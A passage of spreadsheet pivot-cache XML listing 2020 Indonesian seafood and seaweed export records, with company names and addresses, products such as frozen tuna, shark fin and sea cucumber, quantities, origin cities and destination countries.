    <s v="Hong Kong, Malaysia, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="20841"/>
    <x v="117"/>
    <s v="PT. BUDI JAYA BERDIKARI"/>
    <s v="Dusun II, Kel. Air Joman Baru, Kec. Air Joman, Kabupaten Asahan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Daging Kerang Beku"/>
    <d v="2020-08-18T00:00:00"/>
    <n v="500000"/>
    <s v="Kota Medan"/>
    <s v="Hong Kong, Malaysia, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="20842"/>
    <x v="117"/>
    <s v="PT. BUDI JAYA BERDIKARI"/>
    <s v="Dusun II, Kel. Air Joman Baru, Kec. Air Joman, Kabupaten Asahan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Asin Kering"/>
    <d v="2020-08-18T00:00:00"/>
    <n v="5000"/>
    <s v="Kota Medan"/>
    <s v="Hong Kong, Malaysia, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="21231"/>
    <x v="117"/>
    <s v="PT. BUDI JAYA BERDIKARI"/>
    <s v="Dusun II, Kel. Air Joman Baru, Kec. Air Joman, Kabupaten Asahan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Udang Segar"/>
    <d v="2020-08-18T00:00:00"/>
    <n v="500000"/>
    <s v="Kota Medan"/>
    <s v="Hong Kong, Malaysia, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="20101"/>
    <x v="7"/>
    <s v="PT. SINAR SEJAHTERA SENTOSA"/>
    <s v="Jl. Muara Baru Ujung Blok E No.2, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Tuna Segar"/>
    <d v="2020-04-07T00:00:00"/>
    <n v="1500"/>
    <m/>
    <s v="Belgium, France, Germany, Netherlands, Switzerland"/>
  </r>
  <r>
    <n v="20202"/>
    <x v="92"/>
    <s v="CV, SUMBER LAUT REJEKI"/>
    <s v="Jl, Pelelangan Baru Dermaga 1 No,28-29 Muara Angke, Kel, Pluit, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Gulama, Janahan, Kerapu, Layur, Bawal, Kakap, Ayam-ayam, Kuro, Cunang)"/>
    <d v="2020-05-13T00:00:00"/>
    <n v="2400000"/>
    <s v="Kota Jakarta Utara, Kabupaten Tegal"/>
    <s v="China, India, Malaysia, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="19255"/>
    <x v="52"/>
    <s v="PT, BAHARI PRATAMA MANDIRI"/>
    <s v="Jl, Pelita Cipatuguran RT 04 RW 20, Kel, Palabuhanratu, Kec, Palabuhanratu, Kabupaten Sukabumi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ikan Demersal Beku (Mata Goyang, Layur, Samge)"/>
    <d v="2020-06-05T00:00:00"/>
    <n v="270000"/>
    <m/>
    <s v="China, Japan, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="19256"/>
    <x v="52"/>
    <s v="PT, BAHARI PRATAMA MANDIRI"/>
    <s v="Jl, Pelita Cipatuguran RT 04 RW 20, Kel, Palabuhanratu, Kec, Palabuhanratu, Kabupaten Sukabumi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-06-05T00:00:00"/>
    <n v="24000"/>
    <m/>
    <s v="China, Japan, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="19671"/>
    <x v="38"/>
    <s v="CV. JAYA SEAFOOD"/>
    <s v="Jl. Syiah Kuala, Kel. Lamdingin, Kec. Kuta Alam, Kota Banda Aceh&lt;br&gt;Aceh"/>
    <n v="1"/>
    <s v="Cephalopoda Segar (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-02-07T00:00:00"/>
    <n v="2000"/>
    <m/>
    <s v="China, Malaysia, Singapore, United Arab Emirates"/>
  </r>
  <r>
    <n v="20022"/>
    <x v="16"/>
    <s v="PT. LAURA INDO"/>
    <s v="Jl. Sabar Jaya No.59, Kel. Perajen, Kec. Banyuasin I, Kabupaten Banyuasin&lt;br&gt;Sumatera Selatan"/>
    <n v="9"/>
    <s v="Udang Rebus Beku"/>
    <d v="2020-02-28T00:00:00"/>
    <n v="50000"/>
    <m/>
    <s v="Australia, France, United Kingdom, United States"/>
  </r>
  <r>
    <n v="20152"/>
    <x v="48"/>
    <s v="CV. LOBSTER ORIGIN PARADISE"/>
    <s v="Jl. Raya Sengkerang, Kel. Ganti, Kec. Praya Timur, Kabupaten Lombok Tengah&lt;br&gt;Nusa Tenggara Barat"/>
    <n v="18"/>
    <s v="Ikan Pelagis Segar (Tongkol, Lemadang, Marlin, Cakalang, Tenggiri)"/>
    <d v="2020-04-16T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Jakarta Pusat, Kota Bandung, Kota Surabaya, Kota Denpasar"/>
    <s v="China, Hong Kong, Malaysia, Singapore, Thailand"/>
  </r>
  <r>
    <n v="21277"/>
    <x v="118"/>
    <s v="PT. GUMINDO PERKASA INDSUTRI"/>
    <s v="Kampung Penggoreng, Kel. Mangunreja, Kec. Pulo Ampel, Kabupaten Serang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Semi Refined Carrageenan"/>
    <d v="2020-11-05T00:00:00"/>
    <n v="400000"/>
    <s v="Kota Bekasi, Kota Pasuruan, Kota Serang"/>
    <s v="Hong Kong, Malaysia, Thailand, Turkey, Viet Nam"/>
  </r>
  <r>
    <n v="21278"/>
    <x v="118"/>
    <s v="PT. GUMINDO PERKASA INDSUTRI"/>
    <s v="Kampung Penggoreng, Kel. Mangunreja, Kec. Pulo Ampel, Kabupaten Serang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Refined Carrageenan"/>
    <d v="2020-11-05T00:00:00"/>
    <n v="400000"/>
    <s v="Kota Bekasi, Kota Pasuruan, Kota Serang"/>
    <s v="Hong Kong, Malaysia, Thailand, Turkey, Viet Nam"/>
  </r>
  <r>
    <n v="20296"/>
    <x v="119"/>
    <s v="UD. SUMBER AGUNG"/>
    <s v="Jl. Kalijudan Madya V No.10 RT 02 RW 08, Kel. Kalijudan, Kec. Mulyorejo, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Sirip Hiu Kering"/>
    <d v="2020-04-14T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Jakarta Selatan, Kota Surabaya"/>
    <s v="China, Hong Kong, Malaysia, Singapore, Thailand"/>
  </r>
  <r>
    <n v="20294"/>
    <x v="119"/>
    <s v="UD. SUMBER AGUNG"/>
    <s v="Jl. Kalijudan Madya V No.10 RT 02 RW 08, Kel. Kalijudan, Kec. Mulyorejo, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Gelembung Ikan Kering"/>
    <d v="2020-04-14T00:00:00"/>
    <n v="500"/>
    <s v="Kota Jakarta Selatan"/>
    <s v="China, Hong Kong, Malaysia, Singapore, Thailand"/>
  </r>
  <r>
    <n v="20295"/>
    <x v="119"/>
    <s v="UD. SUMBER AGUNG"/>
    <s v="Jl. Kalijudan Madya V No.10 RT 02 RW 08, Kel. Kalijudan, Kec. Mulyorejo, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Teripang Kering"/>
    <d v="2020-04-14T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Jakarta Selatan"/>
    <s v="China, Hong Kong, Malaysia, Singapore, Thailand"/>
  </r>
  <r>
    <n v="20297"/>
    <x v="119"/>
    <s v="UD. SUMBER AGUNG"/>
    <s v="Jl. Kalijudan Madya V No.10 RT 02 RW 08, Kel. Kalijudan, Kec. Mulyorejo, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Teripang Beku"/>
    <d v="2020-04-14T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Jakarta Selatan"/>
    <s v="China, Hong Kong, Malaysia, Singapore, Thailand"/>
  </r>
  <r>
    <n v="20298"/>
    <x v="119"/>
    <s v="UD. SUMBER AGUNG"/>
    <s v="Jl. Kalijudan Madya V No.10 RT 02 RW 08, Kel. Kalijudan, Kec. Mulyorejo, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Sirip Pari Kering"/>
    <d v="2020-04-14T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Jakarta Selatan"/>
    <s v="China, Hong Kong, Malaysia, Singapore, Thailand"/>
  </r>
  <r>
    <n v="20299"/>
    <x v="119"/>
    <s v="UD. SUMBER AGUNG"/>
    <s v="Jl. Kalijudan Madya V No.10 RT 02 RW 08, Kel. Kalijudan, Kec. Mulyorejo, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Sirip Hiu Beku"/>
    <d v="2020-04-14T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Jakarta Selatan"/>
    <s v="China, Hong Kong, Malaysia, Singapore, Thailand"/>
  </r>
  <r>
    <n v="20300"/>
    <x v="119"/>
    <s v="UD. SUMBER AGUNG"/>
    <s v="Jl. Kalijudan Madya V No.10 RT 02 RW 08, Kel. Kalijudan, Kec. Mulyorejo, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Sirip Pari Beku"/>
    <d v="2020-04-14T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Jakarta Selatan"/>
    <s v="China, Hong Kong, Malaysia, Singapore, Thailand"/>
  </r>
  <r>
    <n v="20196"/>
    <x v="36"/>
    <s v="PT. BAHARI BIRU NUSANTARA"/>
    <s v="Jl. Daendels Km 82.6 No.88, Desa Sedayulawas, Kec. Brondong, Kabupaten Lamongan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-03-31T00:00:00"/>
    <n v="50000"/>
    <m/>
    <s v="China, Italy, Malaysia, United States, Viet Nam"/>
  </r>
  <r>
    <n v="19303"/>
    <x v="112"/>
    <s v="PT. PERIKANAN NUSANTARA (PERSERO) UNIT MIMIKA"/>
    <s v="Jl. Kawasan Industri Perikanan Poumako, Kel. Poumako, Kec. Mimika, Kabupaten Mimika&lt;br&gt;Papua"/>
    <n v="34"/>
    <s v="Ikan Demersal Beku (Kakap, Kerapu, Layur, Kakatua)"/>
    <d v="2020-01-29T00:00:00"/>
    <n v="200000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="China, Korea, Republic of, Singapore, Viet Nam"/>
  </r>
  <r>
    <n v="20362"/>
    <x v="120"/>
    <s v="PT. MULTI SARI MAKASSAR"/>
    <s v="Jl. Kima 14 Kav SS 12, Kel. Bira, Kec. Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Tuna Beku"/>
    <d v="2020-03-16T00:00:00"/>
    <n v="30000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="Australia, France, Italy, Japan, United States"/>
  </r>
  <r>
    <n v="20364"/>
    <x v="120"/>
    <s v="PT. MULTI SARI MAKASSAR"/>
    <s v="Jl. Kima 14 Kav SS 12, Kel. Bira, Kec. Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Tuna Segar"/>
    <d v="2020-03-16T00:00:00"/>
    <n v="15000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="Australia, France, Italy, Japan, United States"/>
  </r>
  <r>
    <n v="20130"/>
    <x v="80"/>
    <s v="CV. JASA LAUT"/>
    <s v="Jl. Kapten Muslim Komplek Tata Plaza No.12B, Kel. Dwi Kora, Kec. Medan Helvetia, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Pelagis Segar (Kembung, Sarden, Banjar)"/>
    <d v="2020-03-24T00:00:00"/>
    <n v="500"/>
    <m/>
    <s v="China, Hong Kong, Malaysia, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="20133"/>
    <x v="80"/>
    <s v="CV. JASA LAUT"/>
    <s v="Jl. Kapten Muslim Komplek Tata Plaza No.12B, Kel. Dwi Kora, Kec. Medan Helvetia, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Siput Hidup"/>
    <d v="2020-03-24T00:00:00"/>
    <n v="200000"/>
    <m/>
    <s v="China, Hong Kong, Malaysia, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="20134"/>
    <x v="80"/>
    <s v="CV. JASA LAUT"/>
    <s v="Jl. Kapten Muslim Komplek Tata Plaza No.12B, Kel. Dwi Kora, Kec. Medan Helvetia, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Kepiting Hidup"/>
    <d v="2020-03-24T00:00:00"/>
    <n v="50000"/>
    <m/>
    <s v="China, Hong Kong, Malaysia, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="20135"/>
    <x v="80"/>
    <s v="CV. JASA LAUT"/>
    <s v="Jl. Kapten Muslim Komplek Tata Plaza No.12B, Kel. Dwi Kora, Kec. Medan Helvetia, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Lobster Hidup"/>
    <d v="2020-03-24T00:00:00"/>
    <n v="5000"/>
    <m/>
    <s v="China, Hong Kong, Malaysia, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="20136"/>
    <x v="80"/>
    <s v="CV. JASA LAUT"/>
    <s v="Jl. Kapten Muslim Komplek Tata Plaza No.12B, Kel. Dwi Kora, Kec. Medan Helvetia, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Sidat Hidup"/>
    <d v="2020-03-24T00:00:00"/>
    <n v="20000"/>
    <m/>
    <s v="China, Hong Kong, Malaysia, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="20137"/>
    <x v="80"/>
    <s v="CV. JASA LAUT"/>
    <s v="Jl. Kapten Muslim Komplek Tata Plaza No.12B, Kel. Dwi Kora, Kec. Medan Helvetia, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Belut Hidup"/>
    <d v="2020-03-24T00:00:00"/>
    <n v="20000"/>
    <m/>
    <s v="China, Hong Kong, Malaysia, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="21198"/>
    <x v="121"/>
    <s v="PT. KARYA PERSADA KHATULISTIWA"/>
    <s v="Jl. Mina Ayu RT 13 RW 04, Kel. Limbangan, Kec. Juntinyuat, Kabupaten Indramayu&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Rajungan Segar"/>
    <d v="2020-08-10T00:00:00"/>
    <n v="90000"/>
    <m/>
    <s v="China, Malaysia, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="21230"/>
    <x v="121"/>
    <s v="PT. KARYA PERSADA KHATULISTIWA"/>
    <s v="Jl. Mina Ayu RT 13 RW 04, Kel. Limbangan, Kec. Juntinyuat, Kabupaten Indramayu&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Rajungan Rebus Dingin"/>
    <d v="2020-08-10T00:00:00"/>
    <n v="90000"/>
    <m/>
    <s v="China, Malaysia, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="19722"/>
    <x v="122"/>
    <s v="PT. PRASETYA AGUNG CAHAYA UTAMA"/>
    <s v="Jl. A. Yani I, Dusun Carik Padang, Kel. Nyambu, Kec. Kediri, Kabupaten Tabanan&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Ikan Pelagis Beku (Marlin, Gindara, Salmon)"/>
    <d v="2020-05-20T00:00:00"/>
    <n v="27493.4"/>
    <s v="Kota Jakarta Barat, Kabupaten Bandung, Kota Surabaya, Kota Denpasar"/>
    <s v="China, Malaysia, Myanmar, Singapore, Viet Nam"/>
  </r>
  <r>
    <n v="19732"/>
    <x v="122"/>
    <s v="PT. PRASETYA AGUNG CAHAYA UTAMA"/>
    <s v="Jl. A. Yani I, Dusun Carik Padang, Kel. Nyambu, Kec. Kediri, Kabupaten Tabanan&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Ikan Asap Beku"/>
    <d v="2020-05-20T00:00:00"/>
    <n v="51298.94"/>
    <s v="Kota Jakarta Barat, Kota Bandung, Kota Surabaya, Kota Denpasar"/>
    <s v="China, Malaysia, Myanmar, Singapore, Viet Nam"/>
  </r>
  <r>
    <n v="20641"/>
    <x v="47"/>
    <s v="KOPERASI PERIKANAN MINA RIZKI ABADI"/>
    <s v="Komplek Pelabuhan Perikanan Nusantara Brondong, Kawasan PPDI RT 01 RW 05 Jompong, Kel. Brondong, Kec. Brondong, Kabupaten Lamongan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Beku"/>
    <d v="2020-05-29T00:00:00"/>
    <n v="50000"/>
    <s v="Kabupaten Banyuwangi, Kabupaten Situbondo"/>
    <s v="China, Korea, Democratic People's Republic of"/>
  </r>
  <r>
    <n v="20360"/>
    <x v="120"/>
    <s v="PT. MULTI SARI MAKASSAR"/>
    <s v="Jl. Kima 14 Kav SS 12, Kel. Bira, Kec. Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Demersal Beku (Kakap Putih, Bream, Kerisi, Katamba, Lencam, Kuniran, Kerapu, Kakatua, Kakap Merah, Kaci-kaci)"/>
    <d v="2020-03-16T00:00:00"/>
    <n v="45000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="Australia, France, Netherlands, United States"/>
  </r>
  <r>
    <n v="20361"/>
    <x v="120"/>
    <s v="PT. MULTI SARI MAKASSAR"/>
    <s v="Jl. Kima 14 Kav SS 12, Kel. Bira, Kec. Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Pelagis Beku (Lemuru, Barakuda, Gabus Laut, Terbang, Kuwe, Julung-julung, Lemadang, Marlin, Meka, Gindara, Selar, Layang, Tenggiri)"/>
    <d v="2020-03-16T00:00:00"/>
    <n v="30000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="Australia, France, Netherlands, United States"/>
  </r>
  <r>
    <n v="20367"/>
    <x v="120"/>
    <s v="PT. MULTI SARI MAKASSAR"/>
    <s v="Jl. Kima 14 Kav SS 12, Kel. Bira, Kec. Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Demersal Segar (Kakap Putih, Bream, Kerisi, Katamba, Lencam, Kuniran, Kerapu, Kakatua, Kakap Merah, Kaci-kaci)"/>
    <d v="2020-03-16T00:00:00"/>
    <n v="15000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="Australia, France, Netherlands, United States"/>
  </r>
  <r>
    <n v="20368"/>
    <x v="120"/>
    <s v="PT. MULTI SARI MAKASSAR"/>
    <s v="Jl. Kima 14 Kav SS 12, Kel. Bira, Kec. Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Pelagis Segar (Lemuru, Barakuda, Gabus Laut, Terbang, Kuwe, Julung-julung, Lemadang, Marlin, Meka, Gindara, Selar, Layang, Tenggiri)"/>
    <d v="2020-03-16T00:00:00"/>
    <n v="15000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="Australia, France, Netherlands, United States"/>
  </r>
  <r>
    <n v="20325"/>
    <x v="98"/>
    <s v="CV. SARANA MAJU BERSAMA"/>
    <s v="Jl. Perjuangan Dusun III No.476, Kel. Helvetia, Kec. Labuhan Deli, Kabupaten Deli Serdang&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Kerang Hidup"/>
    <d v="2020-04-21T00:00:00"/>
    <n v="2000"/>
    <s v="Kota Jakarta Barat"/>
    <s v="Malaysia, Taiwan, Province of China, Thailand"/>
  </r>
  <r>
    <n v="21362"/>
    <x v="34"/>
    <s v="PT. MULTI MINA PERSADA"/>
    <s v="Taman Pergudangan dan Perkantoran Muara Baru Blok C5-C6, Jl. Muara Baru Raya No. 30, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Air Tawar Beku (Patin, Nila)"/>
    <d v="2020-10-12T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China, Korea, Democratic People's Republic of"/>
  </r>
  <r>
    <n v="16700"/>
    <x v="123"/>
    <s v="PT. JAWA SUISAN INDAH"/>
    <s v="Jl. Cipatuguran SLK IPB Kampung Neglasari RT 03 RW 20, Kel. Palabuhanratu, Kec. Palabuhanratu, Kabupaten Sukabumi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Fillet Sidat Beku"/>
    <d v="2020-04-02T00:00:00"/>
    <n v="12000"/>
    <m/>
    <s v="Japan, Korea, Democratic People's Republic of"/>
  </r>
  <r>
    <n v="19798"/>
    <x v="124"/>
    <s v="PT. WINDUBLAMBANGAN SEJATI"/>
    <s v="Jl. Gatot Subroto Km 5 No.18, Kel. Bulusan, Kec. Kalipuro, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Cephalopoda Mentah Beku (Gurita)"/>
    <d v="2020-04-01T00:00:00"/>
    <n v="1459169"/>
    <m/>
    <s v="France, Germany, Italy, Sweden, United States"/>
  </r>
  <r>
    <n v="19799"/>
    <x v="124"/>
    <s v="PT. WINDUBLAMBANGAN SEJATI"/>
    <s v="Jl. Gatot Subroto Km 5 No.18, Kel. Bulusan, Kec. Kalipuro, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Cephalopoda Rebus Beku (Gurita)"/>
    <d v="2020-04-01T00:00:00"/>
    <n v="395903"/>
    <m/>
    <s v="France, Germany, Italy, Sweden, United States"/>
  </r>
  <r>
    <n v="19912"/>
    <x v="125"/>
    <s v="CV. SURABAYA OCEAN TRADING"/>
    <s v="Jl. Benteng Miring No.23, Kel. Ujung, Kec. Semampir, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Gelembung Ikan Kering"/>
    <d v="2020-04-09T00:00:00"/>
    <n v="300000"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of"/>
  </r>
  <r>
    <n v="19913"/>
    <x v="125"/>
    <s v="CV. SURABAYA OCEAN TRADING"/>
    <s v="Jl. Benteng Miring No.23, Kel. Ujung, Kec. Semampir, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Teripang Kering"/>
    <d v="2020-04-09T00:00:00"/>
    <n v="300000"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of"/>
  </r>
  <r>
    <n v="19914"/>
    <x v="125"/>
    <s v="CV. SURABAYA OCEAN TRADING"/>
    <s v="Jl. Benteng Miring No.23, Kel. Ujung, Kec. Semampir, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Sirip Hiu Kering"/>
    <d v="2020-04-09T00:00:00"/>
    <n v="200000"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of"/>
  </r>
  <r>
    <n v="20540"/>
    <x v="17"/>
    <s v="PT. BINTANG MEGAH JAYA PERKASA"/>
    <s v="Jl. Batangase No.50, Kel. Batangase, Kec. Bontoa, Kabupaten Maros&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Pelagis Segar (Kembung, Layang, Tenggiri)"/>
    <d v="2020-03-31T00:00:00"/>
    <n v="500000"/>
    <m/>
    <s v="Saudi Arabia, Singapore, United Arab Emirates"/>
  </r>
  <r>
    <n v="21041"/>
    <x v="126"/>
    <s v="PT. KIRANA FOOD INTERNATIONAL"/>
    <s v="Jl. Raya Pakah Ponco, Kel. Sumberagung, Kec. Plumpang, Kabupaten Tuban&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Telur Ikan Terbang Kering"/>
    <d v="2020-06-26T00:00:00"/>
    <n v="12000"/>
    <m/>
    <s v="Japan, Korea, Democratic People's Republic of"/>
  </r>
  <r>
    <n v="21225"/>
    <x v="127"/>
    <s v="PT. HALINDO LAUTAN INDONESIA"/>
    <s v="Pergudangan Gading Mutiara Permai Blok G-11, Kel. Kepatihan, Kec. Menganti, Kabupaten Gresik&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Rumput Laut Kering"/>
    <d v="2020-07-01T00:00:00"/>
    <n v="4800000"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of"/>
  </r>
  <r>
    <n v="21306"/>
    <x v="128"/>
    <s v="CV. MANDIRI"/>
    <s v="Jl. Raya Kalirungkut 5 Blok D-31 Komplek Ruko Rungkut Megah Raya, Kel. Kalirungkut, Kec. Rungkut, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Sirip Hiu Kering"/>
    <d v="2020-10-12T00:00:00"/>
    <n v="25000"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of"/>
  </r>
  <r>
    <n v="21324"/>
    <x v="109"/>
    <s v="PT. BUMI MENARA INTERNUSA"/>
    <s v="Jl. Margomulyo 4E, Kel. Tandes Lor, Kec. Tandes, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Tuna Beku"/>
    <d v="2020-08-05T00:00:00"/>
    <n v="3400000"/>
    <m/>
    <s v="France, Philippines, Singapore, United States"/>
  </r>
  <r>
    <n v="20383"/>
    <x v="104"/>
    <s v="PT. ERA MANDIRI CEMERLANG TBK"/>
    <s v="Ruko Lodan Center, Jl. Lodan Raya No.2 Blok F No.2-7, Kel. Ancol, Kec. Pademangan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Tuna Beku"/>
    <d v="2020-04-28T00:00:00"/>
    <n v="240000"/>
    <m/>
    <s v="Mexico, Netherlands, United States, Viet Nam"/>
  </r>
  <r>
    <n v="20688"/>
    <x v="129"/>
    <s v="CV. SUMBER HARTA LAUT MAS"/>
    <s v="Komp Industri Pergudangan Safe N Lock, Jl. Lingkar Timur O No.1770, Kel. Rangkah Kidul, Kec. Sidoarjo, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Tuna Beku"/>
    <d v="2020-04-24T00:00:00"/>
    <n v="720000"/>
    <s v="Kota Jakarta Utara, Kabupaten Probolinggo, Kabupaten Pasuruan, Kota Surabaya"/>
    <s v="China, Japan, Sri Lanka, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="20330"/>
    <x v="130"/>
    <s v="PT. INKO GIM GORENG"/>
    <s v="Jl. Aria Jaya Santika Kp. Cirende RT 001 RW 005, Kel. Pasir Nangka, Kec. Tigaraksa, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Snack Rumput Laut"/>
    <d v="2020-05-08T00:00:00"/>
    <n v="2000"/>
    <s v="Kota Medan, Kota Padang, Kabupaten Cianjur, Kota Bandung"/>
    <s v="Malaysia, Saudi Arabia, Singapore, Thailand"/>
  </r>
  <r>
    <n v="16889"/>
    <x v="56"/>
    <s v="PT. MINA JAYA WYSIA"/>
    <s v="Pergudangan Bandara Mas Blok T 11, Kel. Kedaung Wetan, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Belut Hidup"/>
    <d v="2020-03-23T00:00:00"/>
    <n v="2000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China, Hong Kong, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="16895"/>
    <x v="56"/>
    <s v="PT. MINA JAYA WYSIA"/>
    <s v="Pergudangan Bandara Mas Blok T 11, Kel. Kedaung Wetan, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Kepiting Hidup"/>
    <d v="2020-03-23T00:00:00"/>
    <n v="2000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China, Hong Kong, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="19814"/>
    <x v="131"/>
    <s v="PT. BANDAR BAHARI SUKSES"/>
    <s v="Gudang Alat Perikanan Blok D No.3 Jl. Dermaga Muara Angke, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Asin Kering"/>
    <d v="2020-02-12T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China, Hong Kong, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="19660"/>
    <x v="60"/>
    <s v="KSU ADI JAYA LESTARI"/>
    <s v="Jl. Pembangunan No.5, Komplek PPI Sodohoa, Kel. Sanua, Kec. Kendari Barat, Kota Kendari&lt;br&gt;Sulawesi Tenggara"/>
    <n v="27"/>
    <s v="Ikan Demersal Beku (Lencam, Kerapu, Layur, Kakatua, Kakap, Kaci-kaci)"/>
    <d v="2020-02-25T00:00:00"/>
    <n v="80000"/>
    <m/>
    <s v="China, Japan, United Kingdom, United States"/>
  </r>
  <r>
    <n v="19661"/>
    <x v="60"/>
    <s v="KSU ADI JAYA LESTARI"/>
    <s v="Jl. Pembangunan No.5, Komplek PPI Sodohoa, Kel. Sanua, Kec. Kendari Barat, Kota Kendari&lt;br&gt;Sulawesi Tenggara"/>
